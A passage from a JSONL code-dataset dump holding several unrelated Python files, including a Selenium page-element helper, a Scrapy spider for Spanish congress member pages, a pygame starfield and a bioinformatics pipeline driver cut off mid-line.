0.3 * np.mean(rmse):\n silence += 1\n silence /= float(len(rmse))\n silence_np = np.array(silence).reshape(1,)\n \n X_func = np.concatenate((np.array(data.mean()), np.array(data.std()), silence_np))\n feat.append(X_func)\n\nfeat = np.array(feat)\nnp.save('./data/msp_feat_ws_128.npy', feat)\n","sub_path":"extract/msp_extract_hfs_ws.py","file_name":"msp_extract_hfs_ws.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319192651","text":"#!/usr/local/bin/python3\n\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\"\"\" BasePageElement classes.\n Descriptors for getting and setting single elements.\n Available field locator types:\n ID,\n NAME,\n XPATH\n\n Extend a BasePageElement object:\n class TextFieldElement(BasePageElement)\n Instantiate extended object (inside of a Page class) with XPATH type:\n text_field = TextFieldElement('XPATH')\n Assign value to instantiated 
text_field:\n        Page.text_field = \"value\"\n    Retrieve value from instantiated text_field:\n        Page.text_field\n\"\"\"\n\nclass BasePageElement(object):\n    \"\"\" Base Page Element class that's initialized on every Page Object class. \"\"\"\n    def __init__(self, element_type=None):\n        ''' Initialize the BasePageElement object with its correct locator type. '''\n        self.element_type = element_type\n\n    def __set__(self, obj, value):\n        ''' Set the text to the value element. '''\n        driver = obj.driver\n\n        # Set text to element found by id\n        if self.element_type == 'ID':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_id(self.locator)\n            )\n            driver.find_element_by_id(self.locator).clear()\n            driver.find_element_by_id(self.locator).send_keys(value)\n\n        # Set text to element found by name\n        elif self.element_type == 'NAME':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_name(self.locator)\n            )\n            driver.find_element_by_name(self.locator).clear()\n            driver.find_element_by_name(self.locator).send_keys(value)\n\n        # Set text to element found by xpath\n        elif self.element_type == 'XPATH':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_xpath(self.locator)\n            )\n            driver.find_element_by_xpath(self.locator).clear()\n            driver.find_element_by_xpath(self.locator).send_keys(value)\n\n    def __get__(self, obj, owner):\n        ''' Get the text of specified element. '''\n        driver = obj.driver\n\n        # Get text of element found by id\n        if self.element_type == 'ID':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_id(self.locator)\n            )\n            element = driver.find_element_by_id(self.locator)\n\n        # Get text of element found by name\n        elif self.element_type == 'NAME':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_name(self.locator)\n            )\n            element = driver.find_element_by_name(self.locator)\n\n        # Get text of element found by xpath\n        elif self.element_type == 'XPATH':\n            WebDriverWait(driver, 30).until(\n                lambda driver: driver.find_element_by_xpath(self.locator)\n            )\n            element = driver.find_element_by_xpath(self.locator)\n        return element.get_attribute(\"value\")\n","sub_path":"includes/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"23755971","text":"from time import time\nfrom random import randint\n\ndef partA(a_list, an_int):\n    sorted_list = sorted(a_list)\n    high = len(a_list) - 1\n    low = 0\n    while low < high:\n        if sorted_list[low] + sorted_list[high] == an_int: return True\n        elif sorted_list[low] + sorted_list[high] > an_int: high -= 1\n        else: low += 1\n    return False\n\ndef partB(a_list, an_int):\n    smallest = max(a_list)\n    index_smallest = a_list.index(smallest)\n    for i in range(len(a_list)):\n        if i != index_smallest:\n            if a_list[index_smallest]+a_list[i] == an_int:\n                return True\n    return False\n\nif __name__ == '__main__':\n    a_list = [10,1,2,3,4,5,6,7,8,9,10]\n\n    start = time()\n    print(partA(a_list, 20))\n    print('%.10f' % (time() - start))\n\n    start = time()\n    print(partB(a_list, 20))\n    print('%.10f' % (time() - start))\n\n    #print()\n    #a_list = [randint(0, 10) for i in range(10)]\n    #print(a_list)\n\n    #start = time()\n    #print(partA(a_list, 20))\n    #print('%.10f' % (time() - start))\n\n    #start = time()\n    #print(partB(a_list, 20))\n    #print('%.10f' % (time() - 
start))\n\n\n","sub_path":"COMP9101/Assignment1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"451477588","text":"from abc import ABCMeta\n\nfrom .utils.conformance import verify_conformance, verify_not_overridden\nfrom .utils.docs import update_docs\n\n\nclass InterfaceMeta(ABCMeta):\n \"\"\"\n A metaclass that helps subclasses of a class to conform to its API.\n\n It also makes sure that documentation that might be useful to a user\n is inherited appropriately, and provides a hook for class to handle\n subclass operations.\n \"\"\"\n\n INTERFACE_EXPLICIT_OVERRIDES = True\n INTERFACE_RAISE_ON_VIOLATION = False\n INTERFACE_SKIPPED_NAMES = {'__init__'}\n\n def __init__(cls, name, bases, dct):\n ABCMeta.__init__(cls, name, bases, dct)\n\n # Register interface class for subclasses\n if not hasattr(cls, '__interface__'):\n cls.__interface__ = cls\n\n # Read configuration\n explicit_overrides = cls.__get_config(bases, dct, 'INTERFACE_EXPLICIT_OVERRIDES')\n raise_on_violation = cls.__get_config(bases, dct, 'INTERFACE_RAISE_ON_VIOLATION')\n skipped_names = cls.__get_config(bases, dct, 'INTERFACE_SKIPPED_NAMES')\n\n # Iterate over names in `dct` and check for conformance to interface\n for key, value in dct.items():\n\n # Skip any key in skipped_names\n if key in skipped_names: # pragma: no cover\n continue\n\n # Identify the first instance of this key in the MRO, if it exists, and check conformance\n is_override = False\n for base in cls.__mro__[1:]:\n if base is object:\n continue\n if key in base.__dict__:\n is_override = True\n cls.__verify_conformance(\n key, name, value, base.__name__, base.__dict__[key],\n explicit_overrides=explicit_overrides,\n raise_on_violation=raise_on_violation\n )\n break\n\n if not is_override:\n verify_not_overridden(key, name, value, raise_on_violation=raise_on_violation)\n\n # Update documentation\n cls.__update_docs(cls, name, bases, dct)\n\n # Call subclass registration hook\n cls.__register_implementation__()\n\n def __register_implementation__(cls):\n pass\n\n @classmethod\n def __get_config(mcls, bases, dct, key):\n default = getattr(mcls, key, None)\n if bases:\n default = getattr(bases[0], key, default)\n return dct.get(key, default)\n\n @classmethod\n def __verify_conformance(mcls, key, name, value, base_name, base_value,\n explicit_overrides=True, raise_on_violation=False):\n return verify_conformance(\n key, name, value, base_name, base_value,\n explicit_overrides=explicit_overrides,\n raise_on_violation=raise_on_violation\n )\n\n @classmethod\n def __update_docs(mcls, cls, name, bases, dct):\n skipped_names = mcls.__get_config(bases, dct, 'INTERFACE_SKIPPED_NAMES')\n return update_docs(cls, name, bases, dct, skipped_names=skipped_names)\n","sub_path":"interface_meta/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"590870947","text":"import urlparse\n\n\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom scrapy.selector import HtmlXPathSelector, Selector\nfrom scrapy.item import Item, Field\nimport pdb\nimport re\nfrom dateutil.parser import parse\n\nfrom scrap.congreso.congreso import Congress\n\nfrom scrap.items import MemberItem\n\n\nclass MemberSpider(CrawlSpider):\n name = 'members'\n allowed_domains = ['congreso.es', ]\n 
start_urls = ['http://www.congreso.es/portal/page/portal/Congreso'\n '/Congreso/Diputados?_piref73_1333056_73_1333049_13'\n '33049.next_page=/wc/menuAbecedarioInicio&tipoBusqu'\n 'eda=completo&idLegislatura=12' ]\n\n rules = []\n rules.append(\n Rule(LinkExtractor(\n allow=['fichaDiputado\\?idDiputado=\\d+&idLegislatura=12'], unique=True),\n callback='parse_member'))\n rules.append(\n Rule(LinkExtractor(\n allow=['busquedaAlfabeticaDiputados&paginaActual=\\d+&idLeg'\n 'islatura=12'\n '&tipoBusqueda=completo'], unique=True), follow=True))\n\n\n\n\n\n\n\n def parse_member(self, response):\n\n\n # extract full name of member\n names = Selector(response).xpath('//div[@class=\"nombre_dip\"]/text()').extract()\n # extra text like member's state\n curriculum = Selector(response).xpath('//div[@class=\"texto_dip\"]/ul/li/div[@class=\"dip'\n '_rojo\"]')\n\n # email, twitter ....\n extra_data = Selector(response).xpath('//div[@class=\"webperso_dip\"]/div/a/@href')\n avatar = Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@class=\"logo_g'\n 'rupo\"]/img[@name=\"foto\"]/@src').extract()\n\n item = MemberItem()\n\n item['url'] = response.url\n item['nombre']=\"\"\n item['imagen']=\"\"\n item['grupo']=\"\"\n item['fecha_alta']=\"\"\n item['fecha_baja']=\"\"\n item['web']=\"\"\n item['correo']=\"\"\n item['twitter']=\"\"\n\n if names:\n second_name, name = names[0].split(',')\n item['nombre'] = second_name.strip()+\", \"+name.strip()\n if avatar:\n item['imagen'] = 'http://www.congreso.es' + avatar[0]\n if curriculum:\n\n group = curriculum.xpath('a/text()')\n\n #pdb.set_trace()\n if group:\n # url is in list, extract it\n item['grupo'] = re.search('\\((.*?)\\)', group.extract()[0]).group(1).strip()\n #item['party_logo'] = 'http://www.congreso.es' +Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@cl'\n # 'ass=\"logo_grupo\"]/a/img/@src').\\\n # extract()[0] #logo de partido\n #item['party_name'] = Selector(response).xpath('//div[@id=\"datos_diputado\"]/p[@clas'\n # 's=\"nombre_grupo\"]/text()').extract()[0] #nombre partido\n\n\n # add dates of inscription and termination\n ins_date = curriculum.re('(?i)(?<=fecha alta:)[\\s]*[\\d\\/]*')\n if ins_date:\n item['fecha_alta'] = parse\\\n (ins_date[0], dayfirst=True)\n term_date = curriculum.re('(?i)(?<=caus\\xf3 baja el)[\\s]*['\n '\\d\\/]*')\n if term_date:\n item['fecha_baja'] = parse\\\n (term_date[0], dayfirst=True)\n\n if extra_data:\n web_data = Selector(response).xpath('//div[@class=\"webperso_dip\"]/div[@class=\"'\n 'webperso_dip_parte\"]/a/@href')\n if web_data:\n web = web_data.re('[http|https]*://.*')\n if web:\n item['web'] = web[0]\n email = extra_data.re('mailto:[\\w.-_]*@[\\w.-_]*')\n if email:\n item['correo'] = email[0].replace('mailto:', '')\n twitter = extra_data.re('[http|https]*://(?:twitter.com)/[\\w]*')\n if twitter:\n item['twitter'] = twitter[0]\n congress = Congress()\n search = congress.getMember(name=item['nombre'])\n if not search:\n item['tipi']=False\n item['activo']=True\n congress.updateorinsertMember(type=\"insert\",item=item)\n else:\n congress.updateorinsertMember(type=\"update\", item=item)\n return item\n\n","sub_path":"scrap/scrap/spiders/members.py","file_name":"members.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"251648895","text":"from math import cos, sin\nfrom random import random, randint\nimport pygame\n\nSCREEN_SIZE = WIDTH, HEIGHT = 1080, 720\nCENTER_X, CENTER_Y = WIDTH // 2, HEIGHT // 
2\n\nBASE_COLOR = pygame.color.Color(0, 255, 0)\nBASE_COLOR_H, BASE_COLOR_S, BASE_COLOR_V, BASE_COLOR_A = BASE_COLOR.hsva\n\nWORLD_SIZE = 1000\nDISTANCE_TO_VIEWING_PLANE = 200\n\nFONT = None\n\nmouse_x, mouse_y = (0, 0)\nis_space_pressed = False\n\nspeed = 2\nangle = 0.01\n\nscreen = pygame.display.set_mode(SCREEN_SIZE)\nclock = pygame.time.Clock()\nFPS = 60\n\nstars = []\nstars_prev = []\n\n\ndef init():\n    global FONT\n\n    pygame.init()\n    FONT = pygame.font.Font(None, 22)\n\n    for i in range(2000):\n        x, y, z = randint(-WORLD_SIZE, WORLD_SIZE), \\\n                  randint(-WORLD_SIZE, WORLD_SIZE), \\\n                  randint(1, WORLD_SIZE)\n        stars.append((x, y, z))\n        stars_prev.append((x, y, z))\n\n\ndef perspective_transform(x, y, z):\n    x_plane = 0 if z * x == 0 else DISTANCE_TO_VIEWING_PLANE / z * x\n    y_plane = 0 if z * y == 0 else DISTANCE_TO_VIEWING_PLANE / z * y\n    return x_plane, y_plane\n\n\ndef to_center(x, y):\n    return x + WIDTH // 2, y + HEIGHT // 2\n\n\ndef rotation(x, y, angle):\n    x1 = x * cos(angle) - y * sin(angle)\n    y1 = x * sin(angle) + y * cos(angle)\n    return x1, y1\n\n\ndef draw(screen):\n    screen.fill((0, 0, 0))\n\n    for i in range(len(stars)):\n        star_xyz = stars[i]\n        prev_star_xyz = stars_prev[i]\n\n        color = pygame.color.Color(0, 0, 0)\n        v = 100 * (1 - (star_xyz[2] / WORLD_SIZE))\n        v = 100 if v > 100 else v\n        v = 0 if v < 0 else v\n        color.hsva = BASE_COLOR_H, BASE_COLOR_S, v, BASE_COLOR_A\n\n        star_screen_x, star_screen_y = to_center(*perspective_transform(*star_xyz))\n        prev_star_screen_x, prev_star_screen_y = to_center(*perspective_transform(*prev_star_xyz))\n\n        #pygame.draw.circle(screen, color, (int(star_screen_x), int(star_screen_y)), 2)\n        pygame.draw.line(screen, color,\n                         (int(star_screen_x), int(star_screen_y)),\n                         (int(prev_star_screen_x), int(prev_star_screen_y)),\n                         2)\n\n\n    pygame.draw.circle(screen, (255, 255, 255), to_center(0, 0), 20, 2)\n    pygame.draw.line(screen, (255, 255, 255), to_center(0, -30), to_center(0, +30), 2)\n    pygame.draw.line(screen, (255, 255, 255), to_center(-30, 0), to_center(+30, 0), 2)\n\n    debug_text = FONT.render(f'speed: {speed}, angle: {angle}', 1, (255, 255, 255))\n    screen.blit(debug_text, (5, 5))\n\n\ndef update():\n    global speed, angle\n    speed = ((HEIGHT // 2) - mouse_y) // 20\n\n    if is_space_pressed:\n        speed = speed * 2\n\n    angle = ((WIDTH // 2) - mouse_x) / 10000\n\n    if is_space_pressed:\n        angle = angle * 2\n\n\n    for i in range(len(stars)):\n        x, y, z = stars[i]\n\n        stars_prev[i] = x, y, z\n\n        x, y = rotation(x, y, angle)\n        z = z - speed\n\n        if z < 1:\n            z = WORLD_SIZE\n            stars_prev[i] = x, y, z\n\n        if z > WORLD_SIZE:\n            z = 1\n            stars_prev[i] = x, y, z\n\n        stars[i] = x, y, z\n\n\ninit()\n\nrunning = True\n\nwhile running:\n    # inside the game loop there is another loop\n    # for receiving and processing messages\n    events = pygame.event.get()\n    for event in events:\n        # when the window is closed\n        if event.type == pygame.QUIT:\n            running = False\n        elif event.type == pygame.MOUSEMOTION:\n            mouse_x, mouse_y = event.pos\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_SPACE:\n                is_space_pressed = True\n        elif event.type == pygame.KEYUP:\n            if event.key == pygame.K_SPACE:\n                is_space_pressed = False\n\n    # draw the objects\n    draw(screen)\n\n    # update object properties\n    update()\n\n    # pause for 1 / FPS sec\n    clock.tick(FPS)\n\n    # refresh the screen\n    pygame.display.flip()\n\npygame.quit()","sub_path":"3Stars/stars-3d.py","file_name":"stars-3d.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
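The stars-3d record above reduces its 3D effect to two small pieces of math: a similar-triangles perspective projection onto a viewing plane at a fixed distance, and a 2D rotation of each star about the view axis. A minimal standalone sketch of those two transforms (the plane distance mirrors the record's constant; the demo points are illustrative only, not taken from the record):

from math import cos, sin

DISTANCE_TO_VIEWING_PLANE = 200  # same convention as the record above

def perspective_transform(x, y, z):
    # Similar triangles: a point at depth z lands at x * d / z on the plane.
    if z == 0:
        return 0.0, 0.0  # guard the eye plane; the record keeps z >= 1
    scale = DISTANCE_TO_VIEWING_PLANE / z
    return x * scale, y * scale

def rotation(x, y, angle):
    # Standard 2D rotation about the origin (the view axis).
    return (x * cos(angle) - y * sin(angle),
            x * sin(angle) + y * cos(angle))

if __name__ == '__main__':
    # A star twice as deep projects half as far from the screen center:
    print(perspective_transform(100, 50, 400))  # (50.0, 25.0)
    print(perspective_transform(100, 50, 800))  # (25.0, 12.5)

Doubling the depth halves the projected offset, which is why distant stars cluster near the screen center and appear to accelerate outward as they approach.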
+{"seq_id":"486399924","text":"import sys\nimport getopt\nimport os\nfrom collections import Counter\nimport merge_bams\nimport get_depth\nimport get_vcfs\nimport remove_chr00\nimport unknown_N_filter\nimport get_known_data\nimport filter_vcfs\n\n\ndef main(args):\n    \"\"\"\n    Main program called in order to run any of the vcf scripts.\n    Usage: python main.py [function_called] -i \n    :param: args\n    Required command line input:\n        [function_called] - Input the function_called you would like to perform from the following list:\n            get_vcfs - generates vcfs from bam files\n            remove_chr00 - filters out chr00 and chr00's breakend partners\n            get_known_data - finds the evidence distribution of vcf files\n            filter_vcfs - filters out SVs based on evidence\n            all - performs all of the above functions\n        -i = Input the file or directory to be examined or parsed.\n            Please note that if one would like to run more than one command, then one ought to input the base\n            directory with all of the files contained directly therein. Currently, this program is not designed to\n            walk through the main directory to find files based on extensions as it seems unnecessary and we do not\n            want to have users accidentally run lumpy on a bunch of forgotten, hidden bam files. However, this may be\n            changed.\n    Additional Requirements for specific functions:\n        get_known_data & all\n            -d = Input the file to be searched through for the read depth. Each line in the file\n                should be formatted as follows: \".bam:\\n\"\n            -t = Input the file that contains all SVs known to exist and be true. This file\n                should be formatted as follows: \"::\n                :\"\n                Please note that you may add as many SV types as you would like.\n            -f = Input the file that contains all SVs known not to exist. This file\n                should be formatted as follows: \"::\n                :\"\n                Please note that you may add as many SV types as you would like.\n        filter_vcfs\n            -d = Input the file to be searched through for the read depth. Each line in the file\n                should be formatted as follows: \".bam:\\n\"\n\n\n    :return: Number indicating whether main ran successfully.\n        0 - ran successfully\n        1 - does not recognize the function called by the command line.\n        2 - no function was called.\n        3 - does not recognize an option that was specified.\n        4 - user specified that they wanted to run all functions but also specific functions.\n        5 - function called more than once. This is not supported due to the methods by which empty parameter fields\n            are filled in (i.e. 
it would not make sense for a filter_vcf call to take a filtered vcf as its input).\n 6 - missing an original input file; the first function has no input file.\n 7 - missing an original read depth file; the first function that requires read depth has no read depth file.\n 8 - missing an original true positive file; the first function that requires false positives has no false\n positives file.\n 9 - missing an original false positive file; the first function that requires true positives has no true\n positives file.\n \"\"\"\n\n subcommands = [\n (\"merge_bams\", []),\n (\"get_depth\", []),\n (\"get_vcfs\", []),\n (\"remove_chr00\", []),\n (\"unknown_N_filter\", []),\n (\"get_known_data\", []),\n (\"filter_vcfs\", []),\n (\"all\", [])\n ]\n\n start = -1\n last_matching_index = -1\n is_function_called = False\n for i in range(len(subcommands)):\n j = 0\n while j in range(len(args)):\n if not args[j].startswith('-'):\n if args[j] not in [pair[0] for pair in subcommands] and args[j].find('/') == -1:\n print(\"Error: Invalid function called.\")\n print(main.__doc__)\n return 1\n if subcommands[i][0] == args[j]:\n is_function_called = True\n if start != -1 and last_matching_index != -1:\n for arg in args[start:j]:\n subcommands[last_matching_index][1].append(arg)\n start = j + 1\n last_matching_index = i\n break\n j += 1\n if i == len(subcommands) - 1:\n for arg in args[start:]:\n subcommands[last_matching_index][1].append(arg)\n if not is_function_called:\n print(\"You must select at least one function.\")\n return 2\n\n for pair in subcommands:\n if len(pair[1]) == 0:\n continue\n function_called = pair[0]\n try:\n opts, args = getopt.getopt(pair[1], 'i:o:d:t:f:r:h')\n except getopt.GetoptError:\n print(\"Error: Invalid command line option.\")\n print(main.__doc__)\n return 3\n\n input = ''\n output = ''\n reference = ''\n depth_file = ''\n true_positive_dict = {}\n false_positive_dict = {}\n multiplicity = Counter([pair[0] for pair in opts])\n if list(filter(lambda a: a != 0 and a != 1, multiplicity.values())):\n print(\"Error: an option was repeated. 
for multiple files, please use directories.\")\n return 3.5\n for opt, arg in opts:\n if opt == '--h':\n print(main.__doc__)\n elif opt == '-i':\n if arg.find(os.getcwd()) == -1:\n if arg.startswith('/'):\n input = os.getcwd() + arg\n else:\n input = os.getcwd() + '/' + arg\n else:\n input = arg\n if input.endswith('/'):\n input = input[:-1]\n elif opt == '-o':\n if arg.find(os.getcwd()) == -1:\n output = os.getcwd() + '/' + arg\n else:\n output = arg\n if function_called == \"get_depth\" or function_called == \"get_known_data\" and os.path.isdir(output):\n print(\"Error: get_depth and get_known_data cannot take a directory as an output.\")\n return 10\n elif opt == '-r':\n if arg.find(os.getcwd()) == -1:\n if arg.startswith('/'):\n reference = os.getcwd() + arg\n else:\n reference = os.getcwd() + '/' + arg\n else:\n reference = arg\n if not os.path.isfile(reference):\n print(\"Error: The reference file must be a file.\")\n return 10\n elif opt == '-d':\n if arg.find(os.getcwd()) == -1:\n depth_file = os.getcwd() + '/' + arg\n else:\n depth_file = arg\n if not os.path.isfile(depth_file):\n print(\"Error: The depth file must be a file.\")\n return 10\n elif opt == '-t':\n if arg.find(os.getcwd()) == -1:\n true_positive_file = os.getcwd() + '/' + arg\n else:\n true_positive_file = arg\n if not os.path.isfile(true_positive_file):\n print(\"Error: The provided true positive file must be a file.\")\n return 10\n reading_true_positive = open(true_positive_file)\n true_positive_dict = {}\n line = reading_true_positive.readline()\n while line:\n info = line.split(':')\n true_positive_dict[info[0] + '.' + info[1]] = [info[2] + '.' + info[3]]\n for left in info[4:]:\n if left.endswith('\\n'):\n left = left[:left.rfind('\\n')]\n true_positive_dict[info[0] + '.' + info[1]].append(left)\n line = reading_true_positive.readline()\n reading_true_positive.close()\n elif opt == '-f':\n if arg.find(os.getcwd()) == -1:\n false_positive_file = os.getcwd() + '/' + arg\n else:\n false_positive_file = arg\n if not os.path.isfile(false_positive_file):\n print(\"Error: The provided false positive file must be a file.\")\n return 10\n reading_false_positive = open(false_positive_file)\n false_positive_dict = {}\n line = reading_false_positive.readline()\n while line:\n info = line.split(':')\n false_positive_dict[info[0] + '.' + info[1]] = [info[2] + '.' + info[3]]\n for left in info[4:]:\n if left.endswith('\\n'):\n left = left[:left.rfind('\\n')]\n false_positive_dict[info[0] + '.' 
+ info[1]].append(left)\n line = reading_false_positive.readline()\n reading_false_positive.close()\n\n if function_called == \"merge_bams\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"get_depth\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"get_vcfs\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"remove_chr00\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n elif function_called == \"unknown_N_filter\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(reference)\n elif function_called == \"get_known_data\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n pair[1].append(true_positive_dict)\n pair[1].append(false_positive_dict)\n elif function_called == \"filter_vcfs\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n elif function_called == \"all\":\n pair[1].clear()\n pair[1].append(input)\n pair[1].append(output)\n pair[1].append(depth_file)\n pair[1].append(reference)\n pair[1].append(true_positive_dict)\n pair[1].append(false_positive_dict)\n\n if not (\"all\", []) in subcommands and not ((\"merge_bams\", []) in subcommands and (\"get_depth\", []) in subcommands\n and (\"get_vcfs\", []) in subcommands and (\"remove_chr00\", []) in subcommands and\n (\"get_known_data\", []) in subcommands and (\"filter_vcfs\", []) in subcommands):\n print(\"Please clarify your command. Would you like to run all processes or %s\" %\n ([pair[0] for pair in subcommands].remove(\"all\")))\n return 4\n if not (\"all\", []) in subcommands:\n # merge_bams\n subcommands[0][1].append(subcommands[7][1][0])\n subcommands[0][1].append('')\n\n # get_depth\n subcommands[1][1].append('')\n subcommands[1][1].append('')\n\n # get_vcfs\n subcommands[2][1].append('')\n subcommands[2][1].append('')\n\n # unknown_N_filter\n subcommands[3][1].append('')\n subcommands[3][1].append('')\n subcommands[3][1].append(subcommands[7][1][3])\n print(subcommands[3][1])\n\n # remove_chr00\n subcommands[4][1].append('')\n subcommands[4][1].append('')\n\n # get_known_data\n subcommands[5][1].append('')\n subcommands[5][1].append('')\n subcommands[5][1].append('')\n subcommands[5][1].append(subcommands[7][1][4])\n subcommands[5][1].append(subcommands[7][1][5])\n\n # filter_vcfs\n subcommands[6][1].append('')\n subcommands[6][1].append(subcommands[7][1][1])\n subcommands[6][1].append('')\n\n subcommands[6][1].clear()\n\n for multiplicity in Counter([pair[0] for pair in subcommands]).values():\n if multiplicity != 1:\n print(\"Please only call a function_called once.\")\n return 5\n\n print(subcommands)\n\n # # Consult with required args checklist\n count = 0\n for i in range(len(subcommands)):\n function_called = subcommands[i][0]\n args = subcommands[i][1]\n for j in range(len(args)):\n if args[j] == '' or args[j] == {}:\n if i == 0 and j == 0:\n # no original input file was provided\n print(\"Error: no original input file was specified.\")\n return 6\n if j == 0:\n if function_called == \"get_vcfs\" or function_called == \"filter_vcfs\":\n if len(subcommands[i - 2][1]) == 0:\n print(\"Error: no original input file was specified.\")\n return 6.25\n else:\n if i != 0 and len(subcommands[i - 1][1]) == 0:\n print(\"Error: no original input file was specified.\")\n return 6.375\n if function_called == \"get_vcfs\" or function_called == 
\"filter_vcfs\":\n args[j] = \"%s\" % (subcommands[i - 2][1][1])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][1])\n print(\"No input file was specified for %s. Using %s.\" % (function_called, args[j]))\n if j == 1:\n # no output was provided - create output file based on input parameters\n if function_called != \"get_depth\" and (os.path.isdir(args[0]) or function_called == \"get_known_data\"):\n containing_folder = subcommands[i][1][0][:subcommands[i][1][0].rfind('/') + 1][\n :subcommands[i][1][0].rfind('/') + 1]\n if function_called == \"merge_bams\":\n args[j] = \"%smerged_bams\" % containing_folder\n elif function_called == \"get_vcfs\":\n args[j] = \"%svcfs\" % containing_folder\n elif function_called == \"remove_chr00\":\n args[j] = \"%sno00_vcfs\" % containing_folder\n elif function_called == \"unknown_N_filter\":\n args[j] = \"%sN_filtered_vcfs\" % containing_folder\n elif function_called == \"get_known_data\":\n args[j] = \"%sknown_calls\" % containing_folder\n elif function_called == \"filter_vcfs\":\n args[j] = \"%sfiltered_vcfs\" % containing_folder\n\n else:\n if function_called == \"merge_bams\":\n print(\"Error: merged_bams must take a directory.\")\n print('|' + args[0] + '|')\n return 6.5\n if function_called == \"get_vcfs\":\n args[j] = \"%s.vcf\" % (subcommands[i][1][0])\n elif function_called == \"remove_chr00\":\n args[j] = \"%s_no00.vcf\" % (subcommands[i][1][0][:-4])\n elif function_called == \"unknown_N_filter\":\n args[j] = \"%sno_high_Ns.vcf\" % (subcommands[i][1][0][:-4])\n elif function_called == \"get_depth\":\n args[j] = \"%s%s_depth_file.txt\" % (subcommands[i][1][0][:subcommands[i][1][0].rfind('/') + 1][\n :subcommands[i][1][0].rfind('/') + 1], subcommands[i][1][0][subcommands[i][1][0].rfind('/') + 1:])\n elif function_called == \"filter_vcfs\":\n args[j] = \"%s_filtered.vcf\" % (subcommands[i][1][0][:-4])\n print(\"No output file was specified for %s. Writing to %s.\" % (function_called, args[j]))\n if j == 2 and function_called == \"unknown_N_filter\":\n #no reference file was provided\n print(\"Error: to run unknown_N_filter, you must take a reference file.\")\n return 6.5\n if j == 3:\n # MUST ADD A DIGIT TO ALL INDEXES BELOW!!\n # no depth_file was provided\n if len(subcommands[1][1]) < 2 and (subcommands[i - 1][0] == \"unknown_N_filter\" or\n len(subcommands[i - 1][1]) < 3) and \\\n (subcommands[i - 1][0] == \"unknown_N_filter\" or len(subcommands[i - 2][1]) < 3):\n print(\"Error: no original depth_file was specified.\")\n return 7\n else:\n if subcommands[i - 1][0] != \"unknown_N_filter\" and len(subcommands[i - 1][1]) >= 3:\n args[j] = \"%s\" % (subcommands[i - 1][1][2])\n else:\n args[j] = \"%s\" % (subcommands[1][1][1])\n print(\"No depth file was specified for %s. Using %s\" % (function_called, args[j]))\n if j == 4:\n # no true_positive_file was provided\n if len(subcommands[i - 1][1]) < 4 and len(subcommands[i - 2][1]) < 4:\n print(\"Error: no original true_positive_file was specified.\")\n return 8\n else:\n if len(subcommands[i - 2][1]) >= 4:\n args[j] = \"%s\" % (subcommands[i - 2][1][3])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][3])\n print(\"No true_positive_file was specified for %s. 
Using %s\" % (function_called, args[j]))\n if j == 5:\n # no false_positive_file was provided\n if len(subcommands[i - 1][1]) < 5 and len(subcommands[i - 2][1]) < 5:\n print(\"Error: no original false_positive_file was specified.\")\n return 9\n else:\n if len(subcommands[i - 2][1]) >= 5:\n args[j] = \"%s\" % (subcommands[i - 2][1][4])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][4])\n print(\"No false_positive_file was specified for %s. Using %s\" % (function_called, args[j]))\n if len(args) >= 2 and os.path.isdir(args[0]) and not os.path.isdir(args[1]) and function_called != \\\n \"get_depth\" and function_called != \"all\":\n os.makedirs(args[1])\n\n count += 1\n\n for pair in subcommands:\n if not len(pair[1]) == 0:\n if pair[0] != \"merge_bams\" and os.path.isdir(pair[1][0]):\n first = True\n if not os.listdir(pair[1][0]):\n print(\"%s was called with an empty directory.\" % pair[0])\n return 10\n for file in os.listdir(pair[1][0]):\n print(file)\n is_callable = False\n in_file = pair[1][0] + '/' + file\n out_file = pair[1][1] + '/' + file\n if pair[0] == \"merge_bams\" and file.endswith(\".bam\"):\n is_callable = True\n out_file += \"m.bam\"\n elif pair[0] == \"get_depth\" and file.endswith(\".bam\"):\n is_callable = True\n out_file = pair[1][0][:pair[1][0].rfind('/')]\n if pair[1][0].endswith('/'):\n out_file = out_file[:out_file.rfind('/')]\n out_file += '/' + \"%s_depth_file.txt\" \\\n % pair[1][0][pair[1][0].rfind('/') + 1:]\n elif pair[0] == \"get_vcfs\" and file.endswith(\".bam\"):\n is_callable = True\n out_file += \".vcf\"\n elif pair[0] == \"remove_chr00\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".no00.vcf\"\n elif pair[0] == 